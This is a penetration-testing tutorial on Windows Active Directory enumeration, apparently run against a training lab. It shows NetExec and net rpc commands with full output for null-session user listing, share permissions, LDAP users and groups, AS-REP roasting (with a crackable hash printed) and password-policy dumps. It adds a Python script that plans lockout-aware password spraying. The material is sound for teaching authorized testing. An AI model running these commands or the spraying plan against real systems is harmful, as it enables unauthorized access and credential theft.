Windows Enumeration
Enumeration is the phase of a penetration test in which detailed information about the target is collected. On Windows and Active Directory hosts this means identifying users, groups, services, shares and policy settings that can be turned into a foothold or a privilege escalation path. The techniques below are demonstrated with NetExec (nxc) and Samba's net rpc against a Windows Server 2019 domain controller (WINTERFELL, north.sevenkingdoms.local) and a Windows Server 2016 host (BRAAVOS, essos.local).
NetExec: User Enumeration
List the user accounts known to the target. nxc asks the SMB service for them and prints each account with its last password change, bad-password count and description. Whether this works without credentials depends on the host still accepting a null session, as WINTERFELL does below. Read the description column closely: it is a common place for administrators to leave plaintext passwords, and the samwell.tarly entry here is exactly that, which is why that account is used for the authenticated examples that follow.
Without Credentials
nxc smb 10.10.10.11 --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.11 445 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
SMB 10.10.10.11 445 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
SMB 10.10.10.11 445 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
SMB 10.10.10.11 445 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
SMB 10.10.10.11 445 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
SMB 10.10.10.11 445 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
SMB 10.10.10.11 445 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
SMB 10.10.10.11 445 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
SMB 10.10.10.11 445 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated 10 local users: NORTH
With Credentials
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.11 445 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
SMB 10.10.10.11 445 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
SMB 10.10.10.11 445 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
SMB 10.10.10.11 445 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
SMB 10.10.10.11 445 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
SMB 10.10.10.11 445 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
SMB 10.10.10.11 445 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
SMB 10.10.10.11 445 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
SMB 10.10.10.11 445 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated 10 local users: NORTH
NetExec: Shares Enumeration
List the shares a host exposes together with the permissions the current identity has on each. Passing a non-existent user with an empty password (-u 'a' -p '') makes the server fall back to Guest, which nxc reports as (Guest). Shares with nothing in the Permissions column (ADMIN$, C$, and here also public, whose remark says it is for domain users) could not be opened by that session. On BRAAVOS the share named all grants READ,WRITE to the anonymous session: an unauthenticated writable share is a finding in its own right.
Without Credentials (Anonymous Access)
nxc smb 10.10.10.23 -u 'a' -p '' --shares
SMB 10.10.10.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.10.10.23 445 BRAAVOS [+] essos.local\a: (Guest)
SMB 10.10.10.23 445 BRAAVOS [*] Enumerated shares
SMB 10.10.10.23 445 BRAAVOS Share Permissions Remark
SMB 10.10.10.23 445 BRAAVOS ----- ----------- ------
SMB 10.10.10.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.10.10.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.10.10.23 445 BRAAVOS C$ Default share
SMB 10.10.10.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.10.10.23 445 BRAAVOS IPC$ Remote IPC
SMB 10.10.10.23 445 BRAAVOS public Basic Read share for all domain users
With Credentials
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
NetExec: LDAP Enumeration
Query the directory itself over LDAP (port 389) with valid credentials. This returns every domain account, 16 here against the 10 the SMB listing produced, adding Administrator, krbtgt, vagrant and the Stark accounts missing from that list, so cross-check both views rather than trusting either alone.
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL [*] Enumerated 16 domain users: north.sevenkingdoms.local
LDAP 10.10.10.11 389 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.10.11 389 WINTERFELL Administrator 2025-10-18 18:41:56 0 Built-in account for administering the computer/domain
LDAP 10.10.10.11 389 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.10.11 389 WINTERFELL vagrant 2021-05-12 11:39:16 0 Vagrant User
LDAP 10.10.10.11 389 WINTERFELL krbtgt 2025-10-18 19:07:40 0 Key Distribution Center Service Account
LDAP 10.10.10.11 389 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
LDAP 10.10.10.11 389 WINTERFELL eddard.stark 2025-10-31 23:47:22 0 Eddard Stark
LDAP 10.10.10.11 389 WINTERFELL catelyn.stark 2025-10-31 23:47:24 0 Catelyn Stark
LDAP 10.10.10.11 389 WINTERFELL robb.stark 2025-10-31 23:47:26 0 Robb Stark
LDAP 10.10.10.11 389 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
LDAP 10.10.10.11 389 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
LDAP 10.10.10.11 389 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
LDAP 10.10.10.11 389 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
LDAP 10.10.10.11 389 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
LDAP 10.10.10.11 389 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
LDAP 10.10.10.11 389 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
LDAP 10.10.10.11 389 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
Group Enumeration
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --groups
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL Administrators
LDAP 10.10.10.11 389 WINTERFELL Users
LDAP 10.10.10.11 389 WINTERFELL Guests
LDAP 10.10.10.11 389 WINTERFELL Print Operators
LDAP 10.10.10.11 389 WINTERFELL Backup Operators
LDAP 10.10.10.11 389 WINTERFELL Replicator
LDAP 10.10.10.11 389 WINTERFELL Remote Desktop Users
LDAP 10.10.10.11 389 WINTERFELL Network Configuration Operators
LDAP 10.10.10.11 389 WINTERFELL Performance Monitor Users
LDAP 10.10.10.11 389 WINTERFELL Performance Log Users
LDAP 10.10.10.11 389 WINTERFELL Distributed COM Users
LDAP 10.10.10.11 389 WINTERFELL IIS_IUSRS
LDAP 10.10.10.11 389 WINTERFELL Cryptographic Operators
LDAP 10.10.10.11 389 WINTERFELL Event Log Readers
LDAP 10.10.10.11 389 WINTERFELL Certificate Service DCOM Access
LDAP 10.10.10.11 389 WINTERFELL RDS Remote Access Servers
<< SNIP FOR BREVITY >>
NetExec: Kerberos Enumeration
AS-REP roasting targets accounts with Kerberos pre-authentication disabled (the "Do not require Kerberos preauthentication" option, userAccountControl flag 0x400000). Because the KDC does not demand proof of the password up front, anyone can send an AS-REQ on behalf of such an account and receive an AS-REP whose enc-part is encrypted with a key derived from the account's password, so the blob can be cracked offline. Given valid credentials, nxc finds these accounts over LDAP, requests an AS-REP for each and writes the result in hashcat format to the file named after --asreproast. The $krb5asrep$23$ prefix marks etype 23 (RC4-HMAC), the weakest encryption type and the fastest to crack.
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --asreproast output.txt
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL [*] Total of records returned 2
LDAP 10.10.10.11 389 WINTERFELL $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:dc53ebd052dc6bea6d6da0e206c3f7eb$a8033ec5c02ae49877f85e0f1af50206cb2cae5e26a9c7bbcb4da74ec6417dc5104d57e23b148530b44efa3c73f83d7426174ea0913b5f6b62c48aa4bf2df3315610b42729e65bb8db74eb09ecf2d842a22ced964ce7c3489b2bdcd6c196de8069aea600b541bf40e1f0ae6a2015be254ec5d954bd7bfc7bba839538acdd27b743b2bae9a7a6a55db96c0e3647734b633ba74e6fd7731690646283a36e43ac79554203e829d55aee938e3590580003027b3329e38683fa29625e7eb1a55f96d287ecbc361ac30b6b61806d38814e304c7966bf65902c4ff732ee11df063d45305d80bb5b2d1384fe340d69f596484ba4e5ea440e7e2c3c644c5c09128e18dab53d18290c185a
Crack the hash using Hashcat
NetExec: Enum Password Policy
Pull the domain password policy before any password guessing. The lockout threshold and reset window bound how many attempts per account are safe in a given time; the minimum length and complexity flag tell you which candidates are not worth a guess. Locking accounts out during an engagement is disruptive for the client and noisy for the blue team, so this is the first thing to check. Here the threshold is 5 bad attempts with a 5-minute reset counter, a minimum length of 5 and no complexity requirement.
Without Credentials (Rare)
nxc smb 10.10.10.11 --pass-pol
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 10.10.10.11 445 WINTERFELL Minimum password length: 5
SMB 10.10.10.11 445 WINTERFELL Password history length: 24
SMB 10.10.10.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 10.10.10.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Complex: 0
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 10.10.10.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 10.10.10.11 445 WINTERFELL Forced Log off Time: Not Set
With Credentials
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --pass-pol
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 10.10.10.11 445 WINTERFELL Minimum password length: 5
SMB 10.10.10.11 445 WINTERFELL Password history length: 24
SMB 10.10.10.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 10.10.10.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 10.10.10.11 445 WINTERFELL Domain Password Complex: 0
SMB 10.10.10.11 445 WINTERFELL
SMB 10.10.10.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 10.10.10.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 10.10.10.11 445 WINTERFELL Forced Log off Time: Not Set
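An added example (not part of NetExec or of the original page) that turns the policy above into a spraying plan: it parses the raw --pass-pol lines, works out how many guesses per account fit in one reset window while staying under the lockout threshold, estimates the wall-clock time a candidate list needs, and drops candidates the policy itself would never have accepted. The sample text is copied from the WINTERFELL run above; the two-attempt safety margin, treating None/Not Set as "no lockout", and the function names are this example's own choices.

```python
import math
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the WINTERFELL policy as printed by `nxc smb 10.10.10.11 --pass-pol` above.
SAMPLE_POLICY = """\
SMB 10.10.10.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 10.10.10.11 445 WINTERFELL Minimum password length: 5
SMB 10.10.10.11 445 WINTERFELL Password history length: 24
SMB 10.10.10.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 10.10.10.11 445 WINTERFELL Domain Password Complex: 0
SMB 10.10.10.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 10.10.10.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 10.10.10.11 445 WINTERFELL Account Lockout Threshold: 5
"""

FIELDS = ("Minimum password length", "Domain Password Complex", "Account Lockout Threshold",
          "Reset Account Lockout Counter", "Locked Account Duration")


@dataclass
class PasswordPolicy:
    min_length: int
    complexity: bool
    lockout_threshold: Optional[int]       # None: lockout disabled
    reset_counter_minutes: Optional[int]   # observation window for failed attempts
    lockout_duration_minutes: Optional[int]


@dataclass
class SprayBudget:
    attempts_per_window: Optional[int]  # None: no lockout, throttle only for stealth
    wait_minutes: int                   # pause between rounds so the bad-password counter resets


def _minutes(text: str) -> Optional[int]:
    """'5 minutes', '1 day 4 minutes', '311 days 2 minutes' -> minutes; None for 'Not Set'/'None'."""
    parts = re.findall(r"(\d+)\s*(day|hour|minute)s?", text)
    if not parts:
        return None
    return sum(int(n) * {"day": 1440, "hour": 60, "minute": 1}[u] for n, u in parts)


def parse_pass_pol(output: str) -> PasswordPolicy:
    """Pull the fields that matter for spraying out of raw nxc output, prefixes and all."""
    found = {}
    for line in output.splitlines():
        m = re.search(rf"({'|'.join(FIELDS)}):\s*(.+?)\s*$", line)
        if m:
            found[m.group(1)] = m.group(2)
    threshold = found.get("Account Lockout Threshold", "None")
    # Assumption: nxc prints 'None' for a zero threshold; '0' and 'Not Set' are treated the same way.
    threshold = None if threshold in ("None", "Not Set", "0") else int(threshold)
    return PasswordPolicy(
        min_length=int(found.get("Minimum password length", "0")),
        complexity=found.get("Domain Password Complex", "0") != "0",
        lockout_threshold=threshold,
        reset_counter_minutes=_minutes(found.get("Reset Account Lockout Counter", "")),
        lockout_duration_minutes=_minutes(found.get("Locked Account Duration", "")),
    )


def spray_budget(policy: PasswordPolicy, safety_margin: int = 2) -> SprayBudget:
    """Attempts per account per window: threshold minus a margin left for the user's own typos."""
    if policy.lockout_threshold is None:
        return SprayBudget(None, 0)
    attempts = max(policy.lockout_threshold - safety_margin, 1)
    return SprayBudget(attempts, policy.reset_counter_minutes or 0)


def estimate_minutes(policy: PasswordPolicy, n_candidates: int) -> int:
    """Minimum waiting time to try n_candidates against each account without tripping lockout."""
    budget = spray_budget(policy)
    if budget.attempts_per_window is None or n_candidates <= 0:
        return 0
    rounds = math.ceil(n_candidates / budget.attempts_per_window)
    return (rounds - 1) * budget.wait_minutes


def meets_complexity(pw: str) -> bool:
    """Character-class part of Windows complexity: at least 3 of upper/lower/digit/other."""
    classes = (any(c.isupper() for c in pw), any(c.islower() for c in pw),
               any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw))
    return sum(classes) >= 3


def filter_candidates(policy: PasswordPolicy, candidates):
    """Drop guesses the policy would never have accepted; they only burn lockout budget."""
    return [pw for pw in candidates
            if len(pw) >= policy.min_length and (not policy.complexity or meets_complexity(pw))]


if __name__ == "__main__":
    policy = parse_pass_pol(SAMPLE_POLICY)
    print(policy, spray_budget(policy), estimate_minutes(policy, 10), sep="\n")
```

With a threshold of 5 and a 5-minute reset counter the plan is 3 guesses per account followed by a 5-minute pause, so 10 candidates need 15 minutes of waiting in total. A complexity flag of 0 means short, single-class passwords such as hodor stay in the candidate list; under a stricter policy they would be discarded before the first request is sent.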
RPC: Users Enumeration
Samba's net rpc can enumerate domain users over MS-RPC as well. -U '%' binds with an empty username and password (a null session), -W sets the domain and -I the target address; listing the members of Domain Users returns every user account plus the SEVENKINGDOMS$ entry, which is a machine/trust account rather than a person. Like the unauthenticated nxc runs above, this only works while the DC still accepts null sessions.
net rpc group members 'Domain Users' -W 'NORTH' -I '10.10.10.11' -U '%'
NORTH\Administrator
NORTH\vagrant
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc